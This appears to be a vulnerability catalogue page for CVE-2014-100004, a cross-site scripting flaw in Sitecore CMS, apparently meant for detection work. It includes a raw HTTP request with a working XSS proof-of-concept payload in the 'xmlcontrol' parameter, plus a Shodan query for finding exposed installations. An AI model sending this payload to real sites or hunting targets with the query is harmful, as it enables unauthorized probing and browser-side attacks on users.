🔙 목록으로 돌아가기

CVE-2014-100004: Sitecore CMS - Cross-Site Scripting

TitleSitecore CMS - Cross-Site Scripting
AuthorDhiyaneshDK
SeverityMedium
ImpactAttackers can execute arbitrary JavaScript in victims' browsers, potentially stealing session cookies, credentials, or performing actions on behalf of users.
RemediationUpdate to a patched version of Sitecore CMS or apply vendor security updates.
CVSS Score6.1
EPSS Score0.00385
CVE IDCVE-2014-100004
CWE IDCWE-79
Shodan Queryhtml:"Sitecore"
Tags cve cve2014 xss sitecore cms vuln

🔍 Vulnerability Description

Sitecore CMS contains a cross-site scripting vulnerability via the “special way” of displaying XML Controls directly, which allows for a Cross Site Scripting Attack.

🌐 HTTP Request

GET /?xmlcontrol=body%20onload=alert(document.domain) HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2014/CVE-2014-100004.yaml

🦈 Packet Capture: ⬇️ Download cve-2014-100004.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A